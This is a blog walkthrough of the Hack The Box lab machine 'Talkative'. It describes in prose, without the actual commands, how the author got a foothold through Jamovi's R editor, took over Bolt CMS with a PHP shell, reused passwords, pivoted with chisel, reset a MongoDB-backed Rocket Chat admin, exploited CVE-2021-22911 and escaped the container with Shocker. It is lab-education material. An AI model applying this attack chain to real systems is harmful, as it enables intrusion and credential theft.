🔎🦶Enumeration/Foothold

I start every box by setting a variable to the boxes IP and running rustscan into xsltproc for an easy to read initial scan:

Copy

Reviewing the initial results I can see Port 80 open so I head over to the website. It redirects me to talkative.htb so I add it to my host file.

Talkative website showing lots of juicy details.

Talkative website showing lots of juicy details.

I have to give some kudos to both authors for going the extra mile (especially TheCyberGeek) and taking the time to make it feel like an actual company website with real sentences. So many boxes are boilerplate templates and miss the initial OSINT.

I see a few possible usernames and their profile page shows [email protected] as the email. I note all three users and continue. At the footer of the page I notice that the Products menu goes to additional links. I also notice that the Talkative.htb link goes to
Bolt CMS. I can see an /bolt page endpoint confirming this but I will leave that till later.

Heading over to the TALK-A-STATS (Coming Soon) page I can see JAMOVI is listed, the application talks about data entry (possible entry point) and has a ‘beta’ version available:

TALK-A-STATS mentioning Jamovi and a 'Beta' version.

TALK-A-STATS mentioning Jamovi and a 'Beta' version.

The link takes me to Port 8080 and immediately I see the following:

TALK-A-STATS application states it has a security issue.

TALK-A-STATS application states it has a security issue.

Clicking the three dots in the top-right corner I can see the version is 0.9.5.5. I Google around and navigate around the application. I find Rj Editor and see that a plugin to run ruby code is installed:

Plugin states you can run R code inside jamovi.

TALK-A-STATS application states it has a security issue.

I went down the 🐰🕳️ for a while and eventually found this article Ethz – R-Manual which allowed me to get a reverse shell on the box.

Running a bash one-liner and catching the reverse shell.

Running a bash one-liner and catching the reverse shell.

I’ve been using pwncat more and more recently which came in handy as it allowed me to download the bolt-administration.omv file from the box locally:

Copy

Inside the xdata.json file I find a few usernames/passwords:

I try the passwords against the services I’ve seen so far and get a hit at the login to the Bolt CMS admin page. Once I was logged in I went to Settings > Configuration > Main Configuration to see if database credentials were available. Next I went to Settings > Configuration > All Configuration Files and noticed a bundles.php file.

Copy

🔝Escalation to Root

I went into the file and put a PHP one-liner and started a pwncat listener. I then navigated to: bundles.php to grab the shell. On the container I use pwncat to upload LinPEAS to the box and proceeded to do a scan. I instantly notice:

I pulled ping to the box and ran a loop. I then proceed to poke at 172.18.0.1 until I got a hit for SSH. Password re-use provided access as the same password for bolt provided my access:

Copy

I used pwncat to upload LinPEAS to the SSHsession. I ran a loud scan but didn’t see anything useful. I decided to upload pspy next to see if anything was running in the background:

I can see an update_mongo.py script running. Looking at the the MonoDB documentation I can see the default ports listed 27017 – 27020. I used LinPEAS alongside its host/port scan capabilities to find the database:

Copy

I then used chisel to forward the port to my local machine:

Copy

Saul Session

Copy

Attacker Session

Copy

Once the connection was in place I 😭 for a moment realizing it required another tool to connect to this database. I found these instructions HERE, ignored them and found a single command for a deprecated tool (tool still works so proceeding with it 😁!):

Copy

Reviewing the results I could now see this database was being used for the Rocket Chat application which I had seen before in HTB Paper. I referred to the link HERE to reset the password.

Logged into Rocket Chat as the Admin account.

Logged into Rocket Chat as the Admin account.

The first thing I did was look for the version number as I saw no chats/channels available:

Rocket Chat version information.

Rocket Chat version information.

After some research I found CSEnox – CVE-2021-22911 AND THIS which showed I could get RCE by using a web hook. The process was pretty straight forward once I understood the script was Nodejs.

🥇First

Copy

🥈Second

Building a WebHook by going to Administration > Integration > Incoming WebHook.

Building a WebHook by going to Administration > Integration > Incoming WebHook.

Finalizing the WebHook with my reverse shell.

Finalizing the WebHook with my reverse shell.

🥉Third

Send the full curl well make sure to have your listener running to catch the shell.

Once on the Box I ran LinPEAS and LinEnum and discovered the box was vulnerable to Shocker. I altered the script to pull the root flag and compiled it. I then uploaded the binary to the box and ran it for the flag. This part is currently not documented (but will be when I’m feeling less lazy).

Rooted

Published On: August 24th, 2022 / Categories: HTB, Technology / Tags: , , , , , , , , , /

One Comment

  1. Christopher Soehnlein 1st July 2022 at 12:12 pm

    I’ve been super busy with life (job, getting married, etc.) that I haven’t been actively writing guides. I have notes for Noter, StreamIO, Trick, Scrambled and Carpediem (ongoing) that I will be publishing on my site in due course.

Leave A Comment